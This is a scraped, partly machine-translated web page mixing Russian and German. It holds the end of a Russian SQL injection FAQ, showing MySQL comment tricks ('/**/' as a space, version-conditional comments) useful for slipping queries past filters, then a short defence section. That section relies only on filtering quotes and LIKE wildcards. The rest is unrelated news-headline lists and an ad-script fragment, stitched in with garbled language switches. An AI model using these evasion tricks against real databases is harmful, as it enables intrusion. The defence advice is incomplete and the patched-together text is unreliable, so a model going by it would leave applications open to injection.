что аналогично запросу

SELECT pass,login FROM users

2) -- еще один вариант комментария в MySQL. Обязателен пробел после этого знака. Beispiel:

SELECT pass,login FROM users -- This is comment

3) /* */ аналог комментария СИ в MySQL. Закрывающая часть необязательна. Для MySQL индеинтична пробелу. Beispiele:

SELECT pass,login FROM users /*This is comment SELECT pass,login /*This is comment*/ FROM users SELECT /**/ pass,login /**/ FROM /**/ users

4) /*!int*/ Расширение предыдущего комментария. Все заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Beispiel:

SELECT pass /*!32302 ,login*/ FROM users

Выведет столбец login если версия MySQL равна либо выше 3.23.02

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

Вы конечно понимаете что именно для этого пункта и писалась вся эта статья. Все пункты и их подпункты были написанны лишь для того что бы понять все серьезнось ситуации, а за использование этих пунктов в целях противоречащих УКРФ автор данной статьи ответственность не несет.

А защитится очень просто. Кстати все три правила относятся к трем способам передачи информации серверу GET, POST, Cookie.

1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1

Erweitern / Reduzieren

Kommentare

im Auge kommentierte halten , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit und die Anonymität des Internets, ändert ihre Meinung nicht teilen, nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.

Kostenlose Kreditkarte mit einem Limit von 15.000 US-Dollar.

'); var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://ad.admitad.com/shuffle/e61acebe19/'+subid_block+'?inject_to='+injectTo; var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x); })();

Alle News

101 Wie Fallschirmschnur zu verwenden Foto 2017.03.05
Alles wollte Sie über Reifen wissen. Markierungsarten, Saisonalität Foto 2017.03.05
Wie hochwertigen natürlichen Gewürzen und Kräutern zu wählen Photo 2017.03.04
Emma Watson (26) Abschnitt für die März - Messe von Vanity Foto 2017.04.03
Emma Watson (Emma Watson) für ein Buch ausgezogen Schönheit der Natur Foto 2017.04.03
Tätowierung mit dem Bild des berühmten Helden Foto 2017.03.03
Fahren die ganze Stadtverkehr in Kiew Photo 2017.02.28
Wie oft sollte man Sex nach Alter haben Foto 2017.02.28
Kalender Fischen und Fisch Prognose Frieden / Raubfische für 2017. Foto 2017.02.26
Fishing Knots , wie ein Haken zu binden, die Vorbereitung zu fliegen Foto 2017.02.26
Euthanasie Coaster, ein Projekt Achterbahn für die Todesstrafe vorgesehen Foto 2017.02.26
WEB - Seite können Beweismittel vor Gericht sein Foto 2017.02.26
In diesem Cosplay wollen Sie selbst spielen Foto 2017.02.25
Elegante Sammlung von Mädchen aus Japan. Foto 2017.02.25
Paste GOI (von GOI - Staat Optical Institute) Foto 2017.02.24
Unnötige Dinge , die schnell loswerden sollte Foto 2017.02.24
Bad täglichen Gewohnheiten, denn von denen gibt es Blähungen Foto 2017.02.24
Steuerhebel Flugzeugmotoren (ORE), man weiß ja nie ... Foto 2017.02.24
Modernes Design Visitenkarte Foto 2017.02.23
Katzen, Künstler Vladimir Rumjanzew Foto 2017.02.23
Interessante Fakten über den Film Prometheus Foto 2017.02.23
Wie auf der NASA - Konferenz berichtet? Foto 2017.02.21
SSL - Zertifikat - Format, wie ein Zertifikat in .pem zu konvertieren, .cer, .crt, .der, pkcs oder pfx Foto 21/02/2017
Arten von Blutungen und Erste - Hilfe - Regeln , die Sie wissen müssen! Foto 2017.02.20
Frühe Anzeichen von Diabetes, müssen Sie nicht ignorieren! Foto 2017.02.20
Haushalts Fehler , die die Schönheit des Inneren töten Foto 2017.02.20
Serebro Gruppe im Maxim - Magazin, März 2017 Foto 2017.02.20
Wie in der Tat 2-3 Tage Kinder sehen die Welt unmittelbar nach der Geburt Foto 2017.02.18
Vollführungsschuhe für Männer Foto 2017.02.18
Hijab, Tschador, Burka - was ist der Unterschied? Foto 2017.02.18
Effektive Yoga - Posen für einen schönen und elastischen Brust Foto 2017.02.15

101 Paracord Dosing Für die meisten Menschen vertraut Fallschirmschnur als ein sehr praktisches Tool , um ... Foto 2017.03.05
Alles wollte Sie über Reifen wissen. Markierungsarten, saisonale Reifen sind die Hauptverbindung zwischen dem Auto und der Straße. Von ... Foto 2017.03.05
Wie qualitativ hochwertige natürliche Gewürze und Würzmittel zu wählen , wie die natürliche Gewürze und Kräuter auf dem Markt zu wählen oder in der ... Foto 2017.03.04
Emma Watson (26 Jahre) ausgezogen für Vanity Fair März Emma zog sich für Vanity Fair Magazin im März jedoch auf dem Cover ... Foto 2017.03.04
Emma Watson (Emma Watson) zog sich für das Buch Natural Beauty Emma beschlossen , es für das Buch Natürliche Schönheit zu tun! Und sie ... Foto 2017.03.04
Tätowierung mit dem Bild des berühmten Helden Bitansky Tattoo - Künstler schafft unglaublich realistische Tattoos mit Bildern von berühmten Helden ... Foto 2017.03.03
Fahren alle kommunalen Verkehrs Kiew Schema markiert alle Bus, Obus und Straßenbahnlinien und ... Foto 2017.02.28
Wie oft sollte man Sex nach Alter haben Viele Menschen sind neugierig , zu wissen, sich in Sex, sind sie zu viele oder zu ... Foto 2017.02.28
Kalender Fischen und Fisch Prognose Frieden / Raubfische im Jahr 2017 Es gibt bestimmte Phasen des Lichts , wenn Sie nur allein sein müssen ... Foto 2017.02.26
Angeln Knoten wie ein Haken zu binden, die Vorbereitung zu fliegen Knotentyp ausgewählt nach der Art der Angelschnur (Monofilament oder ... Foto 2017.02.26
Euthanasie Coaster, eine Achterbahn - Projekt für die Todesstrafe vorgesehen Der Autor räumt ein, dass Achterbahnen sind nicht die optimale Maschine für ... Foto 2017.02.26
WEB - Seite kann vor Gericht Beweise zu verstehen, dass zum Beispiel Urheberrecht nicht selbst verletzen die bestehenden ... Foto 2017.02.26
In diesem Cosplay, wollen Sie spielen grundlegende Spiele - Prototypen Kostüm - Comic - Figuren, Anime, Videospiele, Filme, ... Foto 2017.02.25
Elegante Sammlung von Mädchen aus Japan. Japanisch (Jap nihondzin / nippondzin, Nihon minzoku.) - Die Menschen, die wichtigsten (über 98%) ... Foto 2017.02.25
Paste GOI (von GOI - Staatliche Optical Institute) GOI Paste kann zum Polieren von Produkten aus verschiedenen verwendet werden ... Foto 2017.02.24
Unnötige Dinge , die schnell loszuwerden , sollte lesen Reflexion, in dem Sie lernen , wie gehen zu lassen ... Foto 2017.02.24
Bad täglichen Gewohnheiten, denn von denen gibt es Blähungen angenommen , dass Blähungen - es ist nicht eine separate Krankheit ist, aber ... Foto 2017.02.24
Steuerhebel Flugzeugmotoren (ORE), man weiß ja nie ... Lever Engine Control (RUD) - Antriebsmanagement Raumflugzeuge ... Foto 2017.02.24
Modernes Design Visitenkarte ren Karte (Karte) - traditionelle Medien Kontaktinformationen über eine Person ... Foto 2017.02.23
Katzen, Künstler Vladimir Rumjanzew Vladimir Rumjanzew, 1957 geboren, begann im Alter zu malen von ... Foto 2017.02.23
Interessante Fakten über den Film Prometheus , wer wir wirklich sind? Woher kommen und wohin ... Foto 2017.02.23

Katzen. Maler Vladimir Rumjanzew. Foto 2017.02.23
"Prometheus" - Interessante Fakten Foto 2017.02.23
Gesehen Litauisch Cheerleadern? Sehenswert! 2017.02.23
Olsen, Elizabeth / Elizabeth Olsen Foto 2017.02.23
Sie saß am Fenster, und er ging in ihr Auto ... Foto 2017.02.23
Foto Katzen, Katzen, Kätzchen Foto 2017.02.23
Wie kann Schildkröte laufen Foto 2017.02.23
Bengal - Katze Talking With Kitten 23/02/2017
Nationalbank hat eine neue Münze (Foto) ausgestellt Foto 2017.02.23
Protasov Yar vor 30 Jahren Foto 2017.02.23
Foto Animals Foto 2017.02.23
Übersetzung NASA Was auf der Konferenz der Nasa gesagt Foto 2017.02.23
Etwas über die Größe von Jupiter, Völker "Through" Sun Foto 2017.02.22
Zentrale Straßen von Kiew wird für fünf Tage blockieren Foto 2017.02.20
3 Wege , um Menschen Vagina Engpass und Festigkeit Make Foto 2017.02.20
Monica Bellucci Gq Magazine in Italien, Februar 2017 Foto 2017.02.20
«Serebro» Gruppe B Magazin Maxim, März 2017 Foto 2017.02.20
Was tun , wenn Sie von der Polizei festgehalten werden - Artikel 146 Piracy Foto 2017.02.20
Es ist ein neues kostenloses OS Foto 2017.02.18
Holz unter dem Elektronenmikroskop Foto 2017.02.18
Zahlungskartenmarkt im Jahr 2016 zeigte ein deutliches Wachstum Foto 2017.02.18

Sozial-

Wird geladen ...

Ihre IP: 66.249.93.29
Ihr Land: EU

Free 50 UAH for your Monobank card?

SQL Injection [vollständige FAQ]

0.INTRO

1. Wie SQL-Injection FINDEN

4.Was TUN, WENN ETWAS Filter.

5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL

6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

7.ДОПОЛНЕНИЯ

Kommentare